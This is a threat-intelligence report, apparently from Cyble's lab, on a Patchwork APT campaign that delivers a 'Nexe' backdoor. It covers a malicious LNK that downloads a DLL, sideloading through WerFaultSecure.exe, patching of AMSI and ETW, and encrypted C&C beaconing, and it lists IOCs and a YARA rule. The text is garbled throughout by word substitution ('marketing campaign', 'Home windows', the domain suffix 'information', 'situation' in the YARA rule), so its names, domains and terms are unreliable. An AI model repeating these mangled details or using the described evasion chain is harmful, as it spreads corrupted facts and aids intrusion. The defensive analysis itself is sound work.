Key takeaways
- Cyble Analysis and Intelligence Labs (CRIL) not too long ago encountered an ongoing marketing campaign related to the Patchwork APT group, which is probably going aimed toward Chinese language entities.
- This marketing campaign continues the development of the Patchwork APT group, which has beforehand focused entities in China and Bhutan.
- The risk actors (TAs) have utilized a malicious LNK file, doubtless originating from a phishing e mail, because the preliminary an infection vector. This file executes a PowerShell script that downloads two information: a seemingly innocuous PDF supposed to lure the consumer and a malicious Dynamic Hyperlink Library (DLL).
- This marketing campaign employs DLL sideloading strategies to execute the downloaded DLL utilizing the respectable system file “WerFaultSecure.exe,” thereby obfuscating malicious exercise.
- The loaded DLL decrypts and executes shellcode that modifies the AMSIscanBuffer and ETWEventWrite APIs. This manipulation goals to evade detection mechanisms, permitting the malware to function stealthily throughout the compromised system.
- The shellcode is subsequently used to decrypt and execute the ultimate payload, stealing delicate data from the sufferer’s machine.
Overview
Patchwork, also called Dropping Elephant, is a extremely lively superior persistent risk (APT) group that has been engaged in cyber espionage operations since 2009. Believed to be primarily based in India, this group primarily targets high-profile organizations corresponding to authorities, protection, and diplomatic entities throughout South and Southeast Asia.
Cyble Analysis and Intelligence Labs (CRIL) has been carefully monitoring the actions of the Patchwork APT group since July 2024. On July 24, 2024, CRIL noticed a marketing campaign associated to Patchwork APT. By pivoting by means of the sample of information, CRIL noticed a number of information related to two main Patchwork APT campaigns: the primary concentrating on Bhutan and the second concentrating on Chinese language entities.
Marketing campaign Concentrating on China
This marketing campaign includes a malicious LNK file titled “COMAC_Technology_Innovation.pdf.lnk,” which references the Industrial Plane Company of China and particularly targets Chinese language entities. This lure capitalizes on the seventh COMAC Worldwide Science and Know-how Innovation Week, with TAs leveraging this occasion to concentrate on organizations within the aerospace, know-how analysis, and authorities sectors, thereby growing the success charge of their phishing marketing campaign. Researchers from Aliyun have analyzed this marketing campaign and revealed their findings in a weblog submit detailing the techniques utilized by Patchwork.
Marketing campaign concentrating on Bhutan
One other notable marketing campaign by this group noticed in the identical month focused Bhutan with a file named ‘Large_Innovation_Project_for_Bhutan.pdf.lnk.’ This decoy doc contains a mission proposal for Bhutan from the Adaptation Fund Board.
Ongoing Marketing campaign
Amongst these, a newly recognized LNK file, “186523-pdf.lnk”, seems to be linked to an ongoing marketing campaign of the Patchwork group. This similar pattern was additionally shared by researcher Ginkgo and StrikeReady Labs on X (previously Twitter).
When the malicious LNK file will get executed, this file downloads two parts: a lure PDF and a malicious DLL containing encrypted shellcode. Moreover, it copies a system file from the sufferer’s machine, which is then leveraged to sideload the malicious DLL. This DLL then decrypts and executes the ultimate payload instantly in reminiscence. The malware collects system data, such because the Course of ID, private and non-private IP addresses, usernames, and extra. Then, it transmits this information to the command and management (C&C) server, enabling additional malicious actions, as proven within the picture beneath.
This variant appears to be new in comparison with the payloads noticed in earlier campaigns. For monitoring functions, we’re naming the malware “Nexe” Backdoor, because the string “Nexe” was discovered hardcoded within the binary used for C&C communication.
Notably, this marketing campaign lacks particular targets, because the lure consists of plain, empty PDF. Nonetheless, the names of the payload servers used on this marketing campaign, corresponding to shianchi[.]scapematic.information and jihang[.]scapematic.information means that Chinese language entities are doubtless being focused. Usually, the Patchwork group’s payload server names are related to the nation they’re specializing in.
Technical Particulars
The LNK file, disguised as a PDF, comprises a PowerShell script that carries out a number of malicious actions. The picture beneath exhibits its contents.
The script first makes use of an “Invoke-WebRequest” command to obtain a file from the URL “hxxps://jihang[.]scapematic[.]information/eqhgrh/uybvjxosg” and saves it as a PDF within the “C:ProgramData” listing. This PDF file seems to be the lure doc, however on this case, it comprises no content material and is solely a plain, empty PDF.
Subsequent, the script downloads one other file from a unique URL on the identical area, “hxxps://shianchi[.]scapematic[.]information/jhgfd/jkhxvcf,” saving it initially as “hal” within the “C:ProgramData” listing. It then renames the file to “wer.dll” in the identical location.
The script proceeds to repeat the Home windows system file “WerFaultSecure.exe” from “C:WindowsSystem32” to “C:ProgramData”, more likely to facilitate DLL sideloading. The picture beneath exhibits the downloaded information on the sufferer’s machine.
Lastly, it creates a scheduled job named “EdgeUpdate” to run “WerFaultSecure.exe” at common intervals, guaranteeing persistence on the compromised system. The picture beneath exhibits the scheduled job created on the system.
DLL Sideloading
Risk actors leveraged the DLL sideloading approach to load the malicious DLL file utilizing the respectable WerFaultSecure.exe, as proven within the picture beneath.
After the DLL is efficiently loaded, it decrypts the encrypted shellcode inside it and writes the decrypted content material into the reminiscence of the WerFaultSecure course of, as proven within the picture beneath.
Bypassing Safety Mechanisms through Reminiscence Patching
The injected shellcode is crafted to bypass AMSI and Microsoft’s occasion monitoring techniques by patching particular bytes within the EtwEventWrite, AmsiScanString, and AmsiScanBuffer APIs, as proven within the photos beneath.
As soon as the shellcode overwrites these APIs, it creates a piece object from the beforehand decrypted content material and maps it into the tackle area of WerFaultSecure. This enables the ultimate VC++ compiled payload to execute with out triggering any safety alerts.
Closing Payload
As soon as the payload is efficiently loaded into reminiscence, it makes use of the LoadLibraryW() API to load the required modules for execution, as proven within the picture beneath.
After loading the required modules, the malware creates a mutex named “dsds” to make sure that just one occasion of the malware runs on the sufferer’s system at a time, as proven within the determine beneath.
After creating the mutex, the malware retrieves a deal with to the console window related to the calling course of. It then hides the console window and continues operating within the background.
The malware then makes use of the GetAdaptersInfo() and GetHostName() features to gather details about the community adapters and the gadget title on the compromised machine, as proven within the picture beneath.
The malware queries https://myexternalip.com/uncooked utilizing a particular consumer agent to acquire the sufferer’s public IP tackle, as demonstrated within the picture beneath.
After gathering key system particulars, together with the MAC tackle, username, and IP tackle, the malware computes the SHA256 hash for these values earlier than additional encryption, as proven within the picture beneath.
After producing the hash, the malware encodes it into Base64 format. The ensuing information then enters one other encryption loop utilizing the Salsa20 algorithm, which represents a change from the earlier encryption technique utilized in prior campaigns. That is adopted by an extra spherical of Base64 encoding. The determine beneath exhibits the encryption code with key and nonce.
Along with the beforehand talked about particulars, together with the MAC tackle, username, and IP tackle, the malware additionally retrieves and encrypts the next data utilizing the identical sequence: it first converts the information into Base64 format, then applies the Salsa20 encryption algorithm and at last encodes it once more in Base64:
- Course of ID
- Native IP tackle
- Home windows model
- Username
- Hardcoded user-agent string
Every bit of encrypted system data is concatenated and separated by the “$” image. The picture beneath shows the encrypted system data.
The encrypted information corresponds to the next fields:
- MAC tackle $ username $ public IP tackle $ personal IP tackle $ Home windows model $ username $ Course of ID $ Nexe (hardcoded string) $ Consumer-agent string
Utilizing the ultimate generated string, the malware initiates an HTTP request to a hardcoded area, “iceandfire[.]xyz,” which is embedded within the code, as illustrated within the picture beneath.
After setting up the HTTP request, the malware transmits encrypted information to its C&C server. Nonetheless, for the reason that C&C was not lively throughout the evaluation, we couldn’t absolutely assess its conduct. Regardless of this, following the POST request, the malware creates two threads able to performing numerous duties, as proven within the picture beneath.
The thread extracts partial content material from the initially generated string, which incorporates the encrypted MAC tackle, username, and public IP tackle of the sufferer’s machine, and makes an attempt to ship this information to the identical area.
The threads learn the server’s response following the request after which evaluate the response with the next values:
- add
- uplexe
- obtain
- filelist
- screenshot
This comparability helps the thread to find out the actions or instructions that it ought to execute within the system.
Conclusion
The continued evolution and enhancement of the Patchwork APT group’s malware capabilities spotlight their dedication to remaining on the forefront of espionage and cyber operations. The newest assault exemplifies their capacity to evade safety alerts and execute malicious information instantly in reminiscence, showcasing a classy strategy that underscores their adaptability and resourcefulness within the ever-changing panorama of cybersecurity threats. This adaptability not solely allows them to bypass conventional defenses but additionally poses vital challenges for organizations searching for to guard themselves from such superior techniques.
Suggestions
- The preliminary breach might happen through spam emails. Subsequently, it’s advisable to deploy sturdy e mail filtering techniques to establish and forestall the dissemination of dangerous attachments.
- When dealing with e mail attachments or hyperlinks, notably these from unknown senders, exercising warning is essential. Confirm the sender’s id, notably if an e mail appears suspicious.
- Contemplate disabling or limiting the execution of scripting languages on consumer workstations and servers if they aren’t important for respectable functions.
- Limit the execution of WerFaultSecure.exe to its designated location to stop unauthorized execution from different directories.
- Use a reputed anti-virus and web safety software program bundle in your related units, together with PC, laptop computer, and cell.
- Monitor the beacon on the community stage to dam information exfiltration by malware or TAs.
MITRE ATT&CK® Methods
| Tactic | Method ID | Method Title |
| Preliminary Entry (TA0027) | Phishing (T1660) | Malware distribution through phishing website |
| Execution (TA0002) | Consumer Execution (T1204) | Handbook execution by the consumer |
| Protection Evasion (TA0005) | Masquerading (T1036.008) | LNK file disguised as a respectable PDF file |
| Privilege Escalation (TA0004) |
DLL Aspect-Loading (T1574.002) | Adversaries might execute their very own malicious payloads by side-loading DLLs. |
| Privilege Escalation (TA0004) |
Course of Injection (T1055) | Injects malicious code into werfaultsecure.exe |
| Discovery (TA0007) |
System Data Discovery (T1082) | Queries the system data |
| C&C (TA0011) |
Software Layer Protocol (T1071) |
Malware exe talk to C&C server. |
| Exfiltration (TA0010) | Exfiltration Over C2 Channel (T1041) | Exfiltration Over C2 Channel |
Indicators of Compromise (IOCs)
| Indicators | Indicator Kind |
Description |
| d7b278d20f47203da07c33f646844e74cb690ed802f2ba27a74e216368df7db9 | SHA256 | Malicious LNK file |
| ba262c587f1f5df7c2ab763434ef80785c5b51cac861774bf66d579368b56e31 | SHA256 | Malicious DLL file |
| fe503708d7969e65e9437b56b6559bc9b6bb7f46f3be5022db9406579592670d | SHA256 | Decoy PDF |
| f6d171e79e2fb38b3919011835c8117a1c56788bcf634e69ae67a5e255fb9d58 14bbe421abe496531f4c63b16881eee23fb2c92b2938335dca1668206882201a c3805b8b37eb1ba34057cd6c882dc9bedcebc01ec90a6d4be8d0f6fc82859ecb | SHA256 | Lnk used to focus on Bhutan |
| c6398b5ca98e0da75c7d1ec937507640037ce3f3c66e074c50a680395ecf5eae | SHA256 | Lnk concentrating on Chinese language entities |
| hxxps://shianchi[.]scapematic[.]information/jhgfd/jkhxvcf hxxps://jihang[.]scapematic[.]information/eqhgrh/uybvjxosg | URL | distant server |
| Iceandfire[.]xyz | Area | C&C Server |
Yara Rule
rule Nexe_Backdoor
{
meta:
creator = “Cyble Analysis and Intelligence Labs”
description = “Detects Malicious Backdoor used within the newest Patchwork APTcampaign”
date = “2024-09-26”
os = “Home windows”
reference_sample = “ba262c587f1f5df7c2ab763434ef80785c5b51cac861774bf66d579368b56e3”
strings:
$a = “WerSysprepCleanup”
$b = “WerpSetReportFlags”
$c = “WriteProcessMemory”
$d = “VirtualAllocEx”
$e = “LaunchAESC.pdb”
situation:
uint16(0) == 0x5A4D and all of them
}
References
Associated
